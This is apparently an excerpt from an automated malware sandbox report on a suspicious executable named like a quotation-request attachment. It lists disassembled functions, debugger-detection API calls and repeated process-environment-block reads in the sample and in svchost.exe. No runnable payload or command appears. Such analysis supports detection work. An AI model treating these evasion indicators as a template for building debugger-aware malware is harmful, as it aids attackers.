                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_007B3D19
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,1_2_007E3920
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CE01E LoadLibraryA,GetProcAddress,1_2_007CE01E
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0149C120 mov eax, dword ptr fs:[00000030h]1_2_0149C120
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0149D760 mov eax, dword ptr fs:[00000030h]1_2_0149D760
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0149D7C0 mov eax, dword ptr fs:[00000030h]1_2_0149D7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382E388 mov eax, dword ptr fs:[00000030h]7_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382E388 mov eax, dword ptr fs:[00000030h]7_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382E388 mov eax, dword ptr fs:[00000030h]7_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385438F mov eax, dword ptr fs:[00000030h]7_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385438F mov eax, dword ptr fs:[00000030h]7_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03828397 mov eax, dword ptr fs:[00000030h]7_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03828397 mov eax, dword ptr fs:[00000030h]7_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03828397 mov eax, dword ptr fs:[00000030h]7_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EC3CD mov eax, dword ptr fs:[00000030h]7_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]7_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]7_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]7_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]7_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]7_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]7_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]7_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]7_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]7_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]7_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B63C0 mov eax, dword ptr fs:[00000030h]7_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE3DB mov eax, dword ptr fs:[00000030h]7_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE3DB mov eax, dword ptr fs:[00000030h]7_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE3DB mov ecx, dword ptr fs:[00000030h]7_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE3DB mov eax, dword ptr fs:[00000030h]7_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D43D4 mov eax, dword ptr fs:[00000030h]7_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D43D4 mov eax, dword ptr fs:[00000030h]7_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]7_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E3F0 mov eax, dword ptr fs:[00000030h]7_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E3F0 mov eax, dword ptr fs:[00000030h]7_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E3F0 mov eax, dword ptr fs:[00000030h]7_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038663FF mov eax, dword ptr fs:[00000030h]7_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A30B mov eax, dword ptr fs:[00000030h]7_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A30B mov eax, dword ptr fs:[00000030h]7_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A30B mov eax, dword ptr fs:[00000030h]7_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382C310 mov ecx, dword ptr fs:[00000030h]7_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03850310 mov ecx, dword ptr fs:[00000030h]7_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03908324 mov eax, dword ptr fs:[00000030h]7_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03908324 mov ecx, dword ptr fs:[00000030h]7_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03908324 mov eax, dword ptr fs:[00000030h]7_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03908324 mov eax, dword ptr fs:[00000030h]7_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]7_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]7_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]7_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]7_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B035C mov ecx, dword ptr fs:[00000030h]7_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]7_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]7_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FA352 mov eax, dword ptr fs:[00000030h]7_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D8350 mov ecx, dword ptr fs:[00000030h]7_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0390634F mov eax, dword ptr fs:[00000030h]7_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D437C mov eax, dword ptr fs:[00000030h]7_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E284 mov eax, dword ptr fs:[00000030h]7_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E284 mov eax, dword ptr fs:[00000030h]7_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B0283 mov eax, dword ptr fs:[00000030h]7_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B0283 mov eax, dword ptr fs:[00000030h]7_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B0283 mov eax, dword ptr fs:[00000030h]7_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038402A0 mov eax, dword ptr fs:[00000030h]7_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038402A0 mov eax, dword ptr fs:[00000030h]7_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]7_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C62A0 mov ecx, dword ptr fs:[00000030h]7_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]7_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]7_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]7_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]7_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]7_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]7_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]7_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]7_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]7_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039062D6 mov eax, dword ptr fs:[00000030h]7_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038402E1 mov eax, dword ptr fs:[00000030h]7_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038402E1 mov eax, dword ptr fs:[00000030h]7_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038402E1 mov eax, dword ptr fs:[00000030h]7_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382823B mov eax, dword ptr fs:[00000030h]7_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B8243 mov eax, dword ptr fs:[00000030h]7_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B8243 mov ecx, dword ptr fs:[00000030h]7_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0390625D mov eax, dword ptr fs:[00000030h]7_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382A250 mov eax, dword ptr fs:[00000030h]7_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836259 mov eax, dword ptr fs:[00000030h]7_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EA250 mov eax, dword ptr fs:[00000030h]7_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EA250 mov eax, dword ptr fs:[00000030h]7_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03834260 mov eax, dword ptr fs:[00000030h]7_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03834260 mov eax, dword ptr fs:[00000030h]7_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03834260 mov eax, dword ptr fs:[00000030h]7_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382826B mov eax, dword ptr fs:[00000030h]7_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]7_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03870185 mov eax, dword ptr fs:[00000030h]7_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EC188 mov eax, dword ptr fs:[00000030h]7_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EC188 mov eax, dword ptr fs:[00000030h]7_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D4180 mov eax, dword ptr fs:[00000030h]7_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D4180 mov eax, dword ptr fs:[00000030h]7_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]7_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]7_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]7_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]7_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382A197 mov eax, dword ptr fs:[00000030h]7_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382A197 mov eax, dword ptr fs:[00000030h]7_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382A197 mov eax, dword ptr fs:[00000030h]7_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F61C3 mov eax, dword ptr fs:[00000030h]7_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F61C3 mov eax, dword ptr fs:[00000030h]7_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]7_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]7_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]7_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]7_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039061E5 mov eax, dword ptr fs:[00000030h]7_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038601F8 mov eax, dword ptr fs:[00000030h]7_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]7_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DA118 mov ecx, dword ptr fs:[00000030h]7_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DA118 mov eax, dword ptr fs:[00000030h]7_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DA118 mov eax, dword ptr fs:[00000030h]7_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DA118 mov eax, dword ptr fs:[00000030h]7_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F0115 mov eax, dword ptr fs:[00000030h]7_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03860124 mov eax, dword ptr fs:[00000030h]7_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]7_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]7_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C4144 mov ecx, dword ptr fs:[00000030h]7_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]7_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]7_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382C156 mov eax, dword ptr fs:[00000030h]7_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C8158 mov eax, dword ptr fs:[00000030h]7_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836154 mov eax, dword ptr fs:[00000030h]7_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836154 mov eax, dword ptr fs:[00000030h]7_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904164 mov eax, dword ptr fs:[00000030h]7_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904164 mov eax, dword ptr fs:[00000030h]7_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383208A mov eax, dword ptr fs:[00000030h]7_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038280A0 mov eax, dword ptr fs:[00000030h]7_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C80A8 mov eax, dword ptr fs:[00000030h]7_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F60B8 mov eax, dword ptr fs:[00000030h]7_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F60B8 mov ecx, dword ptr fs:[00000030h]7_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B20DE mov eax, dword ptr fs:[00000030h]7_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038380E9 mov eax, dword ptr fs:[00000030h]7_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B60E0 mov eax, dword ptr fs:[00000030h]7_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382C0F0 mov eax, dword ptr fs:[00000030h]7_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038720F0 mov ecx, dword ptr fs:[00000030h]7_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B4000 mov ecx, dword ptr fs:[00000030h]7_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]7_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]7_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]7_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]7_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]7_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382A020 mov eax, dword ptr fs:[00000030h]7_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382C020 mov eax, dword ptr fs:[00000030h]7_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C6030 mov eax, dword ptr fs:[00000030h]7_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03832050 mov eax, dword ptr fs:[00000030h]7_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6050 mov eax, dword ptr fs:[00000030h]7_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385C073 mov eax, dword ptr fs:[00000030h]7_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D678E mov eax, dword ptr fs:[00000030h]7_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038307AF mov eax, dword ptr fs:[00000030h]7_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E47A0 mov eax, dword ptr fs:[00000030h]7_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383C7C0 mov eax, dword ptr fs:[00000030h]7_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B07C3 mov eax, dword ptr fs:[00000030h]7_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038527ED mov eax, dword ptr fs:[00000030h]7_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038527ED mov eax, dword ptr fs:[00000030h]7_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038527ED mov eax, dword ptr fs:[00000030h]7_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BE7E1 mov eax, dword ptr fs:[00000030h]7_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038347FB mov eax, dword ptr fs:[00000030h]7_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038347FB mov eax, dword ptr fs:[00000030h]7_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C700 mov eax, dword ptr fs:[00000030h]7_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830710 mov eax, dword ptr fs:[00000030h]7_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03860710 mov eax, dword ptr fs:[00000030h]7_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C720 mov eax, dword ptr fs:[00000030h]7_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C720 mov eax, dword ptr fs:[00000030h]7_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386273C mov eax, dword ptr fs:[00000030h]7_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386273C mov ecx, dword ptr fs:[00000030h]7_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386273C mov eax, dword ptr fs:[00000030h]7_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AC730 mov eax, dword ptr fs:[00000030h]7_2_038AC730
